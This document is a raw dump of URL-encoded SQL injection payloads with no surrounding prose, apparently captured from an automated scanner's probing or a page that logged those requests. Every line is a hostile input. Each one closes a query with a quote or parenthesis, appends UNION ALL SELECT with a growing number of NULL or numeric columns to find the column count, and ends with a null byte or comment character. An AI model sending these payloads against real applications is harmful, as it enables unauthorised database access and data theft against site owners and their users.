-3996%27%20IN%20BOOLEAN%20MODE%29%20UNION%20ALL%20SELECT%201831%2C%201831%2C%201831%2C%201831%2C%201831%2C%201831%2C%201831%2C%201831%2C%201831%2C%201831%2C%201831%2C%201831%2C%201831%2C%201831%2C%201831%2C%201831%2C%201831%2C%201831%2C%201831%2C%201831%2C%201831%2C%201831%2C%201831%2C%201831%2C%201831%2C%201831%2C%201831%2C%201831%2C%201831%2C%201831%2C%201831%2C%201831%2C%201831%2C%201831%2C%201831%2C%201831%2C%201831%2C%201831%00%20%23 -1952%27%20IN%20BOOLEAN%20MODE%29%20UNION%20ALL%20SELECT%201755%2C%201755%2C%201755%2C%201755%2C%201755%2C%201755%2C%201755%2C%201755%2C%201755%2C%201755%2C%201755%2C%201755%2C%201755%2C%201755%2C%201755%2C%201755%2C%201755%2C%201755%2C%201755%2C%201755%2C%201755%2C%201755%2C%201755%2C%201755%2C%201755%2C%201755%2C%201755%2C%201755%2C%201755%2C%201755%2C%201755%2C%201755%2C%201755%2C%201755%2C%201755%2C%201755%2C%201755%2C%201755%2C%201755%00%20%23 -4822%27%20IN%20BOOLEAN%20MODE%29%20UNION%20ALL%20SELECT%207340%2C%207340%2C%207340%2C%207340%2C%207340%2C%207340%2C%207340%2C%207340%2C%207340%2C%207340%2C%207340%2C%207340%2C%207340%2C%207340%2C%207340%2C%207340%2C%207340%2C%207340%2C%207340%2C%207340%2C%207340%2C%207340%2C%207340%2C%207340%2C%207340%2C%207340%2C%207340%2C%207340%2C%207340%2C%207340%2C%207340%2C%207340%2C%207340%2C%207340%2C%207340%2C%207340%2C%207340%2C%207340%2C%207340%2C%207340%00%20%23 1234.5%29%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%00 1234.5%29%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%00 1234.5%29%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%00 1234.5%29%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%00 1234.5%29%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%00 1234.5%29%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%00 1234.5%29%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%00 1234.5%29%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%00 1234.5%29%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%00 1234.5%29%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%00 1234.5%27%29%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%00 1234.5%27%29%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%00 1234.5%27%29%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%00 1234.5%27%29%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%00 1234.5%27%29%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%00 1234.5%27%29%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%00 1234.5%27%29%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%00 1234.5%27%29%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%00 1234.5%27%29%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%00 1234.5%27%29%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%00 1234.5%27%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%00 1234.5%27%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%00 1234.5%27%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%00 1234.5%27%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%00 1234.5%27%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%00 1234.5%27%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%00 1234.5%27%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%00 1234.5%27%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%00 1234.5%27%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%00 1234.5%27%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%00 1234.5%22%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%00 1234.5%22%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%00 1234.5%22%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%00 1234.5%22%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%00 1234.5%22%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%00 1234.5%22%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%00 